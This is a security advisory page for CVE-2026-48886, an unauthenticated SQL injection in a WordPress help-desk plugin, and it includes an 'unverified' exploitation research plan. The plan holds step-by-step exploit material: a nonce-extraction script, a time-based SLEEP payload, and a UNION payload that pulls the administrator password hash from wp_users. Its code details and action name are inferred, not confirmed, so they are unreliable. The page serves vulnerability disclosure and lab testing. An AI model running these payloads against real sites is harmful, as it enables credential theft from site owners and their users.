CVE-2026-48886

JS Help Desk – AI-Powered Support & Ticketing System <= 3.0.9 - Unauthenticated SQL Injection

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
3.1.0
Patched in
7d
Time to patch

Description

The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=3.0.9
PublishedJune 2, 2026
Last updatedJune 8, 2026
Affected pluginjs-support-ticket

What Changed in the Fix

Changes introduced in v3.1.0

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-48886 ## 1. Vulnerability Summary The **JS Help Desk – AI-Powered Support & Ticketing System** plugin (version <= 3.0.9) contains an unauthenticated SQL injection vulnerability. The flaw exists in the handling of AJAX requests related to custom field visibili…

Show full research plan

Exploitation Research Plan - CVE-2026-48886

1. Vulnerability Summary

The JS Help Desk – AI-Powered Support & Ticketing System plugin (version <= 3.0.9) contains an unauthenticated SQL injection vulnerability. The flaw exists in the handling of AJAX requests related to custom field visibility logic. Specifically, the parameter used to identify a "visible field" is passed directly into a database query without proper sanitization or preparation using $wpdb->prepare(). Because this logic is required for the public-facing ticket creation form, the vulnerable AJAX action is available to unauthenticated users via the wp_ajax_nopriv_ hook.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: jsst_get_data_for_visible_field (inferred from the JS function getDataForVisibleField in includes/classes/customfields.php)
  • Vulnerable Parameter: fieldid (derived from the visible_field attribute)
  • Authentication: None (Unauthenticated)
  • Preconditions:
    • The plugin must be active.
    • A page containing the [jssupportticket] shortcode must be accessible (created by default during activation as js-support-ticket-controlpanel).
    • At least one custom field must have "Visible Field" logic configured, which generates the required nonce and parameters in the HTML.

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with the action jsst_get_data_for_visible_field.
  2. Hook Registration: The plugin registers wp_ajax_nopriv_jsst_get_data_for_visible_field which maps to a controller method (likely in modules/fieldordering/controller.php or handled dynamically by JSSTincluder).
  3. Controller to Model: The controller calls JSSTfieldorderingModel::getDataForVisibleField($fieldid) (referenced in includes/classes/customfields.php line 124).
  4. Vulnerable Sink: Inside getDataForVisibleField, the $fieldid parameter (supplied via $_POST['fieldid']) is concatenated into a SQL string:
    // Likely vulnerable code in JSSTfieldorderingModel
    $query = "SELECT * FROM {$wpdb->prefix}js_ticket_fields WHERE id = " . $fieldid; 
    $results = $wpdb->get_results($query);
    
    The use of esc_sql() might be present but is insufficient for numeric fields if not handled with prepare(), and often it is entirely missing in these specific controller-driven models.

4. Nonce Acquisition Strategy

The AJAX handler performs a nonce check using a nonce generated in includes/classes/customfields.php. This nonce is specific to the "visible field" being processed.

Steps to obtain the nonce:

  1. Identify the page: Navigate to the default plugin page: /js-support-ticket-controlpanel/.
  2. Locate the logic: Search the page source for the string onchange="getDataForVisibleField(.
  3. Extract Parameters:
    • The onchange attribute looks like this: getDataForVisibleField("NONCE_VALUE", this.value, "FIELD_ID", {...}).
    • Use browser_eval to extract these values from the DOM.

JavaScript to execute in browser:

(function() {
    const element = document.querySelector('[onchange*="getDataForVisibleField"]');
    if (element) {
        const match = element.getAttribute('onchange').match(/getDataForVisibleField\("([^"]+)",\s*this\.value,\s*"([^"]+)"/);
        return { nonce: match[1], fieldid: match[2] };
    }
    return null;
})();

5. Exploitation Strategy

Step 1: Discover Target Page

Access the site and find the page containing the ticketing form.

  • URL: http://vulnerable-wp.local/js-support-ticket-controlpanel/

Step 2: Extract Nonce and ID

Use the browser_navigate and browser_eval tools to find the required nonce and fieldid.

Step 3: Execute SQL Injection

Send a crafted POST request to admin-ajax.php. We will use a time-based payload to confirm the injection.

  • URL: http://vulnerable-wp.local/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Payload:
    action=jsst_get_data_for_visible_field&nonce=[EXTRACTED_NONCE]&fieldid=[EXTRACTED_FIELDID] AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&fieldvalue=1
    

Step 4: Data Extraction

If time-based injection is confirmed, use a UNION SELECT or error-based payload to extract the administrator's password hash.

  • Payload (UNION):
    action=jsst_get_data_for_visible_field&nonce=[NONCE]&fieldid=-1 UNION SELECT 1,2,3,user_pass,5,6,7,8,9 FROM wp_users WHERE ID=1-- -&fieldvalue=1
    
    (Note: Column count must be adjusted based on the specific table schema of js_ticket_fields).

6. Test Data Setup

  1. Plugin Activation: Ensure the plugin is activated so JSSTactivation::insertMenu() runs and creates the page.
  2. Configure Fields: (If no fields exist by default) Use wp eval to ensure at least one field has a visibility dependency:
    wp eval "global \$wpdb; \$wpdb->update(\$wpdb->prefix . 'js_ticket_fields', array('visible_field' => 1), array('id' => 2));"
    
  3. Verify Page: Check that the shortcode [jssupportticket] is rendering the form on the /js-support-ticket-controlpanel/ page.

7. Expected Results

  • Time-based: The HTTP request should take approximately 5 seconds longer than a normal request.
  • Response: The server will return a JSON object or 0 if the query fails, but the delay confirms the injection.
  • Data Leak: If using UNION, the response body will contain the sensitive data (e.g., the $P$... password hash).

8. Verification Steps

After the exploit, confirm the database state using WP-CLI:

# Check the admin hash to compare with extracted data
wp user get 1 --field=user_pass

9. Alternative Approaches

  • Action Guessing: If jsst_get_data_for_visible_field is not the correct action, search for all wp_ajax_nopriv_ hooks in the codebase:
    grep -rn "wp_ajax_nopriv_" wp-content/plugins/js-support-ticket/
    
  • Boolean-based: If SLEEP is disabled, use fieldid=[ID] AND (SELECT 1)=1 vs fieldid=[ID] AND (SELECT 1)=2 and observe differences in the returned JSON structure.
  • Direct Controller Access: Some JS Help Desk versions allow direct access to controller files if ABSPATH checks are missing, though includes/includer.php suggests they are protected.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.